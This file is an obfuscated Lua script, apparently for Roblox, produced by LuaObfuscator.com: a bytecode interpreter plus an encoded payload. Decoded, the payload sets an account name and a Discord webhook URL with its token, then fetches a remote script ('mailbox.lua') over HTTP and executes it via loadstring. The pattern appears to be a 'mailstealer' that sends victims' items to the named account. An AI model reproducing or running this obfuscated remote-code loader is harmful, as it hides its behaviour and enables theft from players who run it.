--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v68=(v31/(((882 -(282 + 595)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((2192 -(1523 + 114)) + 64)))) + (932 -(857 + 74)))) ;return v68-(v68%1) ;else local v69=(570 -(367 + 181 + 20))^(v32-(928 -(214 + 713))) ;return (((v31%(v69 + v69))>=v69) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=(957 -(892 + 65)) -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1066 -(68 + 997))) then return (v38 * (16778486 -(226 + 1044))) + (v37 * ((680758 -395388) -219834)) + (v36 * 256) + v35 ;end if (v34==(117 -(32 + 85))) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + 3 ;v34=1;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=1817 -(1703 + 114) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==2) then v44=nil;v45=nil;v39=704 -(376 + 325) ;end if (v39==(4 -1)) then v46=nil;while true do if (v40==1) then v45=v24();v46={};for v98=1,v45 do local v99=0 -0 ;local v100;local v101;local v102;while true do if (v99==(1 + 0)) then v102=nil;while true do if (v100~=0) then else local v113=0 -0 ;while true do if (v113~=(14 -(9 + 5))) then else v101=v22();v102=nil;v113=377 -(85 + 291) ;end if (v113~=(1266 -(243 + 1022))) then else v100=1;break;end end end if (v100~=1) then else if (v101==(3 -2)) then v102=v22()~=0 ;elseif (v101==(2 + 0)) then v102=v25();elseif (v101~=(1183 -(1123 + 57))) then else v102=v26();end v46[v98]=v102;break;end end break;end if (v99~=(0 + 0)) then else v100=0;v101=nil;v99=255 -(163 + 91) ;end end end v44[3]=v22();v40=1932 -(1869 + 61) ;end if (v40==(1 + 1)) then local v96=0;while true do if (v96~=0) then else for v108=1,v24() do local v109=0 -0 ;local v110;while true do if (v109~=(0 -0)) then else v110=v22();if (v21(v110,1,1 + 0 )~=(0 -0)) then else local v126=0;local v127;local v128;local v129;local v130;local v131;while true do if (v126~=1) then else v129=nil;v130=nil;v126=2;end if (v126==(2 + 0)) then v131=nil;while true do if (v127==(1475 -(1329 + 145))) then v130=nil;v131=nil;v127=973 -(140 + 831) ;end if ((1850 -(1409 + 441))~=v127) then else local v172=718 -(15 + 703) ;local v173;while true do if (v172~=(0 + 0)) then else v173=438 -(262 + 176) ;while true do if (1~=v173) then else v127=1;break;end if (v173~=(1721 -(345 + 1376))) then else local v182=0;while true do if (v182==0) then v128=688 -(198 + 490) ;v129=nil;v182=1;end if ((4 -3)~=v182) then else v173=2 -1 ;break;end end end end break;end end end if ((1208 -(696 + 510))==v127) then while true do if (v128==(0 -0)) then local v174=1262 -(1091 + 171) ;while true do if (v174~=1) then else v128=1;break;end if (v174~=(0 + 0)) then else local v183=0;while true do if (v183==1) then v174=1;break;end if (v183==(0 -0)) then local v187=0 -0 ;while true do if ((374 -(123 + 251))~=v187) then else v129=v21(v110,2,14 -11 );v130=v21(v110,4,6);v187=1;end if (v187~=1) then else v183=699 -(208 + 490) ;break;end end end end end end end if ((1 + 0)~=v128) then else local v175=0;while true do if (v175~=(0 + 0)) then else v131={v23(),v23(),nil,nil};if (v129==(675 -(534 + 141))) then local v184=0;local v185;local v186;while true do if (v184~=1) then else while true do if (v185~=(0 + 0)) then else v186=0;while true do if (v186~=(0 + 0)) then else v131[3 + 0 ]=v23();v131[4]=v23();break;end end break;end end break;end if (v184==(0 -0)) then local v189=0 -0 ;while true do if (v189==(2 -1)) then v184=1;break;end if (v189==0) then v185=0;v186=nil;v189=1 + 0 ;end end end end elseif (v129==1) then v131[3]=v24();elseif (v129==2) then v131[2 + 1 ]=v24() -(2^16) ;elseif (v129==3) then local v192=0;local v193;while true do if ((396 -(115 + 281))~=v192) then else v193=0;while true do if (v193~=(0 -0)) then else v131[3]=v24() -(2^(14 + 2)) ;v131[4]=v23();break;end end break;end end end v175=1;end if (v175~=1) then else v128=2;break;end end end if (v128~=2) then else local v176=0;local v177;local v178;while true do if (v176==(2 -1)) then while true do if (v177~=0) then else v178=0 -0 ;while true do if (1==v178) then v128=870 -(550 + 317) ;break;end if (v178~=(0 -0)) then else local v191=0 -0 ;while true do if (v191==(2 -1)) then v178=286 -(134 + 151) ;break;end if (v191==0) then local v194=1665 -(970 + 695) ;while true do if (v194==1) then v191=1 -0 ;break;end if ((1990 -(582 + 1408))~=v194) then else if (v21(v130,1,3 -2 )~=(1 -0)) then else v131[2]=v46[v131[2]];end if (v21(v130,7 -5 ,2)==1) then v131[1827 -(1195 + 629) ]=v46[v131[3 -0 ]];end v194=1;end end end end end end break;end end break;end if (v176~=0) then else v177=0;v178=nil;v176=242 -(187 + 54) ;end end end if (v128==3) then if (v21(v130,3,3)==(781 -(162 + 618))) then v131[3 + 1 ]=v46[v131[3 + 1 ]];end v41[v108]=v131;break;end end break;end end break;end if (v126==0) then v127=0 -0 ;v128=nil;v126=1;end end end break;end end end for v111=1 -0 ,v24() do v42[v111-(1 + 0) ]=v29();end v96=1637 -(1373 + 263) ;end if (v96==(1001 -(451 + 549))) then return v44;end end end if (v40==0) then local v97=0 + 0 ;while true do if (v97~=(1 -0)) then else v43={};v44={v41,v42,nil,v43};v97=2;end if (v97==(2 -0)) then v40=342 -(218 + 123) ;break;end if (v97==(1581 -(1535 + 46))) then v41={};v42={};v97=1 + 0 ;end end end end break;end if (v39~=(0 + 0)) then else v40=0;v41=nil;v39=1;end if (v39==1) then v42=nil;v43=nil;v39=562 -(306 + 254) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1272 -(945 + 326) ;local v50=(v21(v48,(2 -1) + (1900 -(106 + 1794)) ,(13 + 26) -19 ) * ((1469 -(899 + 568))^(22 + 10))) + v47 ;local v51=v21(v48,50 -29 ,634 -(268 + 335) );local v52=((v21(v48,32)==(291 -(60 + 230))) and  -(573 -(426 + 146))) or (1172 -(418 + 753)) ;if (v51==(0 + 0)) then if (v50==(1456 -(282 + 1174))) then return v52 * (0 + 0) ;else v51=1 + (0 -0) ;v49=(2196 -1385) -(569 + 242) ;end elseif (v51==(5896 -3849)) then return ((v50==(0 + 0)) and (v52 * ((1 + 0)/(1322 -(1249 + 73))))) or (v52 * NaN) ;end return v8(v52,v51-(2047 -(706 + 318)) ) * (v49 + (v50/((1253 -(721 + 530))^(124 -72)))) ;end v26=nil;function v26(v53)local v54=114 -(4 + (190 -80)) ;local v55;local v56;while true do if (v54==(585 -(57 + 527))) then v55=v3(v16,v19,(v19 + v53) -(1428 -(41 + 1386)) );v19=v19 + v53 ;v54=2;end if ((103 -(17 + 86))==v54) then v55=nil;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=1;end if (v54==2) then v56={};for v76=1 -0 , #v55 do v56[v76]=v2(v1(v3(v55,v76,v76)));end v54=(26 -18) -5 ;end if (v54==(169 -(122 + 44))) then return v6(v56);end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 1 + 1 ;return (v59 * (518 -262)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v60,1,1));return "";end end else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v60,16));if v20 then local v103=v5(v72,v20);v20=nil;return v103;else return v72;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=10) then if (v91<=4) then if (v91<=1) then if (v91>0) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else do return;end end elseif (v91<=2) then local v115=v90[2];v88[v115]=v88[v115](v13(v88,v115 + 1 ,v83));elseif (v91==3) then v88[v90[2]]=v90[3];else local v135=v90[2];local v136=v88[v90[3]];v88[v135 + 1 ]=v136;v88[v135]=v136[v90[4]];end elseif (v91<=7) then if (v91<=5) then v88[v90[2]]=v90[3]~=0 ;elseif (v91>6) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else v82=v90[3];end elseif (v91<=8) then v88[v90[2]]=v90[3]~=0 ;elseif (v91==9) then local v141=v90[2];v88[v141]=v88[v141](v13(v88,v141 + 1 ,v83));else local v143=0;local v144;local v145;while true do if (v143==1) then v88[v144 + 1 ]=v145;v88[v144]=v145[v90[4]];break;end if (v143==0) then v144=v90[2];v145=v88[v90[3]];v143=1;end end end elseif (v91<=15) then if (v91<=12) then if (v91>11) then v82=v90[3];else v63[v90[3]]=v88[v90[2]];end elseif (v91<=13) then v88[v90[2]]=v90[3];elseif (v91==14) then local v146=v90[2];local v147,v148=v81(v88[v146](v13(v88,v146 + 1 ,v90[3])));v83=(v148 + v146) -1 ;local v149=0;for v159=v146,v83 do v149=v149 + 1 ;v88[v159]=v147[v149];end else v88[v90[2]]();end elseif (v91<=18) then if (v91<=16) then v88[v90[2]]=v63[v90[3]];elseif (v91>17) then v88[v90[2]]=v63[v90[3]];else local v152=0;local v153;local v154;local v155;local v156;while true do if (v152==0) then v153=v90[2];v154,v155=v81(v88[v153](v13(v88,v153 + 1 ,v90[3])));v152=1;end if (v152==1) then v83=(v155 + v153) -1 ;v156=0;v152=2;end if (v152==2) then for v169=v153,v83 do v156=v156 + 1 ;v88[v169]=v154[v156];end break;end end end elseif (v91<=19) then v88[v90[2]]();elseif (v91==20) then do return;end else v63[v90[3]]=v88[v90[2]];end v82=v82 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030C3O006F6C6976657274793132313203073O00576562482O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F3130393237343638302O3439333238373O342F6D46535171397965532O75384D676A5F46687A3743526463583343677246496E4B6C736F4B696864317336345564474B2O6C5A326F5235724970416A75307375356E615F00153O0012033O00013O0026073O000C0001000200040C3O000C0001001210000100033O001210000200043O00200A000200020005001203000400064O0005000500014O000E000200054O000200013O00022O000F00010001000100040C3O001400010026073O00010001000100040C3O00010001001203000100083O001215000100073O0012030001000A3O001215000100093O0012033O00023O00040C3O000100012O00143O00017O00",v9(),...);end
